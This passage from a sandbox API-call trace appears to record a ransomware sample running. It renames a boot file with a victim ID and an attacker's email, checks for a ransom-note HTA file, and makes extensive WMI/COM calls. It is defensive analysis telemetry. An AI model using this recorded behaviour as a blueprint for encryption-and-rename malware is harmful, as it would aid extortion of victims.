(bstr="9C354B42") returned 0x10 [0158.845] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.845] IWbemClassObject:Get (in: This=0x673b930, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3663500*=8, plFlavor=0x3663504*=0 | out: pVal=0x641f1e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3663500*=8, plFlavor=0x3663504*=0) returned 0x0 [0158.846] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.846] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.846] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0158.846] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3a [0158.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f244) returned 1 [0158.846] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x641f2c0 | out: lpFileInformation=0x641f2c0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0158.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f240) returned 1 [0158.846] MoveFileW (lpExistingFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\BOOTSECT.BAK.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\bootsect.bak.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0158.847] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0158.847] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x641ee80, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0158.847] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.hta", lpFilePart=0x0) returned 0x13 [0158.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2e8) returned 1 [0158.847] GetFileAttributesExW (in: lpFileName="C:\\info-decrypt.hta" (normalized: "c:\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x641f364 | out: lpFileInformation=0x641f364*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0158.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2e4) returned 1 [0158.847] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x641ee04, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0158.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2b0) returned 1 [0158.847] GetFileAttributesExW (in: lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), fInfoLevelId=0x0, lpFileInformation=0x366395c | out: lpFileInformation=0x366395c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2ac) returned 1 [0158.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f24c) returned 1 [0158.848] FindFirstFileW (in: lpFileName="C:\\hiberfil.sys", lpFindFileData=0x641ef8c | out: lpFindFileData=0x641ef8c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 0x77b3b0 [0158.848] FindClose (in: hFindFile=0x77b3b0 | out: hFindFile=0x77b3b0) returned 1 [0158.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f248) returned 1 [0165.693] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x641ed24, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0165.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f218) returned 1 [0165.693] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0165.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641e050) returned 1 [0165.695] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0165.695] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0165.696] CoTaskMemFree (pv=0x7b3f80) [0165.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x641ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0165.696] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f20c | out: ppv=0x641f20c*=0x72015c) returned 0x0 [0165.696] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f204 | out: pAptType=0x641f204*=1) returned 0x0 [0165.696] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f208 | out: ppvObject=0x641f208*=0x0) returned 0x80004002 [0165.696] IUnknown:Release (This=0x72015c) returned 0x1 [0165.697] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eb78 | out: ppv=0x641eb78*=0x6736f48) returned 0x0 [0165.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ed90 | out: ppvObject=0x641ed90*=0x0) returned 0x80004002 [0165.697] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eda4 | out: ppvObject=0x641eda4*=0x6738690) returned 0x0 [0165.697] WbemDefPath:IUnknown:Release (This=0x6736f48) returned 0x0 [0165.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9c4 | out: ppvObject=0x641e9c4*=0x6738690) returned 0x0 [0165.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e980 | out: ppvObject=0x641e980*=0x0) returned 0x80004002 [0165.698] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0165.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e2dc | out: ppvObject=0x641e2dc*=0x0) returned 0x80004002 [0165.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e28c | out: ppvObject=0x641e28c*=0x0) returned 0x80004002 [0165.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e298 | out: ppvObject=0x641e298*=0x77c198) returned 0x0 [0165.698] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c198, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e2a0 | out: pCid=0x641e2a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0165.698] WbemDefPath:IUnknown:Release (This=0x77c198) returned 0x3 [0165.698] CoGetContextToken (in: pToken=0x641e2f8 | out: pToken=0x641e2f8) returned 0x0 [0165.698] CoGetContextToken (in: pToken=0x641e700 | out: pToken=0x641e700) returned 0x0 [0165.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e790 | out: ppvObject=0x641e790*=0x0) returned 0x80004002 [0165.698] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0165.698] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0165.698] CoGetContextToken (in: pToken=0x641f088 | out: pToken=0x641f088) returned 0x0 [0165.699] CoGetContextToken (in: pToken=0x641efe8 | out: pToken=0x641efe8) returned 0x0 [0165.699] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x641f0b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641f0b4 | out: ppvObject=0x641f0b4*=0x6738690) returned 0x0 [0165.699] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0165.699] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0165.699] WbemDefPath:IWbemPath:SetText (This=0x6738690, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x641f234*=0x0, pszText=0x0 | out: puBuffLength=0x641f234*=0x20, pszText=0x0) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x641f234*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f234*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x641f1b8 | out: puCount=0x641f1b8*=0x0) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x641f1a4 | out: puCount=0x641f1a4*=0x2) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0x0, pszText=0x0 | out: puBuffLength=0x641f1a0*=0xf, pszText=0x0) returned 0x0 [0165.699] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0165.699] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f154 | out: ppv=0x641f154*=0x72015c) returned 0x0 [0165.699] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f14c | out: pAptType=0x641f14c*=1) returned 0x0 [0165.699] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f150 | out: ppvObject=0x641f150*=0x0) returned 0x80004002 [0165.700] IUnknown:Release (This=0x72015c) returned 0x1 [0165.700] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eac0 | out: ppv=0x641eac0*=0x6736ec8) returned 0x0 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ecd8 | out: ppvObject=0x641ecd8*=0x0) returned 0x80004002 [0165.701] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ec8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ecec | out: ppvObject=0x641ecec*=0x6738700) returned 0x0 [0165.701] WbemDefPath:IUnknown:Release (This=0x6736ec8) returned 0x0 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e90c | out: ppvObject=0x641e90c*=0x6738700) returned 0x0 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e8c8 | out: ppvObject=0x641e8c8*=0x0) returned 0x80004002 [0165.701] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e224 | out: ppvObject=0x641e224*=0x0) returned 0x80004002 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e1d4 | out: ppvObject=0x641e1d4*=0x0) returned 0x80004002 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e1e0 | out: ppvObject=0x641e1e0*=0x7ae550) returned 0x0 [0165.701] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae550, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e1e8 | out: pCid=0x641e1e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0165.701] WbemDefPath:IUnknown:Release (This=0x7ae550) returned 0x3 [0165.701] CoGetContextToken (in: pToken=0x641e240 | out: pToken=0x641e240) returned 0x0 [0165.701] CoGetContextToken (in: pToken=0x641e648 | out: pToken=0x641e648) returned 0x0 [0165.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e6d8 | out: ppvObject=0x641e6d8*=0x0) returned 0x80004002 [0165.702] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0165.702] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0165.702] CoGetContextToken (in: pToken=0x641efd0 | out: pToken=0x641efd0) returned 0x0 [0165.702] CoGetContextToken (in: pToken=0x641ef30 | out: pToken=0x641ef30) returned 0x0 [0165.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x641f000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641effc | out: ppvObject=0x641effc*=0x6738700) returned 0x0 [0165.702] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0165.702] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0165.702] WbemDefPath:IWbemPath:SetText (This=0x6738700, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0165.702] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x641f17c | out: puCount=0x641f17c*=0x2) returned 0x0 [0165.702] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x641f178*=0x0, pszText=0x0 | out: puBuffLength=0x641f178*=0xf, pszText=0x0) returned 0x0 [0165.702] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x641f178*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0165.702] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f17c | out: ppv=0x641f17c*=0x72015c) returned 0x0 [0165.702] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f174 | out: pAptType=0x641f174*=1) returned 0x0 [0165.702] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f178 | out: ppvObject=0x641f178*=0x0) returned 0x80004002 [0165.702] IUnknown:Release (This=0x72015c) returned 0x1 [0165.703] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641ed98 | out: ppv=0x641ed98*=0x672f2b0) returned 0x0 [0165.703] WbemLocator:IUnknown:QueryInterface (in: This=0x672f2b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641efb0 | out: ppvObject=0x641efb0*=0x0) returned 0x80004002 [0165.703] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f2b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641efc4 | out: ppvObject=0x641efc4*=0x6736e98) returned 0x0 [0165.703] WbemLocator:IUnknown:Release (This=0x672f2b0) returned 0x0 [0165.703] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ebe4 | out: ppvObject=0x641ebe4*=0x6736e98) returned 0x0 [0165.703] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eba0 | out: ppvObject=0x641eba0*=0x0) returned 0x80004002 [0165.704] WbemLocator:IUnknown:AddRef (This=0x6736e98) returned 0x3 [0165.704] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e4fc | out: ppvObject=0x641e4fc*=0x0) returned 0x80004002 [0165.704] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e4ac | out: ppvObject=0x641e4ac*=0x0) returned 0x80004002 [0165.704] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e4b8 | out: ppvObject=0x641e4b8*=0x0) returned 0x80004002 [0165.704] CoGetContextToken (in: pToken=0x641e518 | out: pToken=0x641e518) returned 0x0 [0165.704] CoGetContextToken (in: pToken=0x641e920 | out: pToken=0x641e920) returned 0x0 [0165.704] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9b0 | out: ppvObject=0x641e9b0*=0x0) returned 0x80004002 [0165.704] WbemLocator:IUnknown:Release (This=0x6736e98) returned 0x2 [0165.704] WbemLocator:IUnknown:Release (This=0x6736e98) returned 0x1 [0165.704] CoGetContextToken (in: pToken=0x641ef90 | out: pToken=0x641ef90) returned 0x0 [0165.704] CoGetContextToken (in: pToken=0x641eef0 | out: pToken=0x641eef0) returned 0x0 [0165.704] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x641efc0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x641efbc | out: ppvObject=0x641efbc*=0x6736e98) returned 0x0 [0165.704] WbemLocator:IUnknown:AddRef (This=0x6736e98) returned 0x3 [0165.704] WbemLocator:IUnknown:Release (This=0x6736e98) returned 0x2 [0165.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x641f158 | out: puCount=0x641f158*=0x2) returned 0x0 [0165.704] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x641f154*=0x0, pszText=0x0 | out: puBuffLength=0x641f154*=0xf, pszText=0x0) returned 0x0 [0165.704] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x641f154*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f154*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0165.704] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, 